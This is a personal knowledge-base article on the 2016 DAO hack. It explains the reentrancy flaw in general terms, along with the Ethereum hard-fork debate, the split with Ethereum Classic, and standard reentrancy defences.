My Knowledge Base

The DAO Hack (2016)

3 min read

The DAO Hack (2016)

The DAO hack of June 2016 was a smart contract exploit that drained 3.6 million ETH (~$60 million USD at the time) from The DAO — a decentralised autonomous organisation venture fund built on Ethereum. The community response to this hack permanently split Ethereum into two chains: Ethereum (ETH) and Ethereum Classic (ETC).

Background: What Was The DAO?

The DAO (Decentralised Autonomous Organisation) was a smart contract-based venture capital fund launched on April 30, 2016. Token holders could propose and vote on investment targets; profits would flow back proportionally.

  • Fundraise: approximately 12 million ETH (~$150M at the time) — more than 10% of all ETH in circulation
  • Governance model: purely on-chain; token holder votes determined funding allocations
  • Fatal flaw: a reentrancy vulnerability in the withdrawal mechanism

The Exploit: Reentrancy Attack

On June 17, 2016, an attacker exploited a reentrancy vulnerability in the splitDAO function:

  1. The attacker called the withdrawal function to extract ETH from their DAO position
  2. Before The DAO updated the attacker’s internal balance, the function called back to an attacker-controlled contract
  3. The attacker’s contract immediately re-entered the withdrawal function
  4. This loop repeated, draining ETH each iteration before the balance was decremented

Total drained: 3.6 million ETH (~$50–60M)

The stolen ETH remained temporarily locked in a child DAO contract subject to a 28-day delay — this bought the Ethereum community time to respond.

The Governance Crisis

The hack triggered an unprecedented governance crisis. Three positions emerged:

PositionProposed responseRationale
Hard fork (majority)Reverse all DAO transactions via a protocol-level forkProtect users; the attacker exploited unintended behaviour
Soft forkFreeze the attacker’s fundsPrevent further drainage without reverting history
No actionLeave the chain as-isCode is law; altering the chain sets a dangerous precedent

Vitalik Buterin and the Ethereum Foundation supported the hard fork on user protection grounds. Critics — including those who would become Ethereum Classic proponents — argued that forking the chain:

  • Undermined the foundational promise of immutability
  • Set a precedent for future interventions by powerful stakeholders
  • Contradicted the “trustless” narrative of smart contracts

The soft fork proposal was eventually abandoned when researchers identified it could enable a different DoS attack.

The Fork and Its Aftermath

On July 20, 2016 (block 1,920,000), the Ethereum network executed the hard fork:

  • A refund contract was deployed allowing DAO token holders to reclaim their ETH
  • The majority chain (ETH) rolled back the hack
  • A minority that rejected the fork continued the original chain → Ethereum Classic (ETC)

Immediate consequences:

  • Both chains initially traded at rough parity
  • ETC maintained the attacker’s original stolen funds (still locked in the child DAO)
  • The SEC examined The DAO as a potential unregistered security offering — no charges were filed

Long-term consequences:

  • Ethereum community developed more rigorous smart contract security practices (formal verification, audits)
  • The ICO boom of 2017–2018 occurred on Ethereum despite the hack — developers learned from it without abandoning the platform
  • ETC became the reference point for “code is law” maximalism in the blockchain space

Technical Legacy: Reentrancy as a Security Primitive

The DAO hack established reentrancy as the canonical smart contract vulnerability:

  • Prevention: “Checks-Effects-Interactions” pattern — update all internal state before making external calls
  • OpenZeppelin ReentrancyGuard — the standard defence; used in virtually all modern DeFi contracts
  • Solidity improvements: the language has since added warnings and tools to flag reentrancy risks

Sources

Related concepts: ethereum-classic | smart-contracts | ethereum | ethereum-virtual-machine | blockchain Related entities: vitalik-buterin | ethereum-foundation

Graph View

Backlinks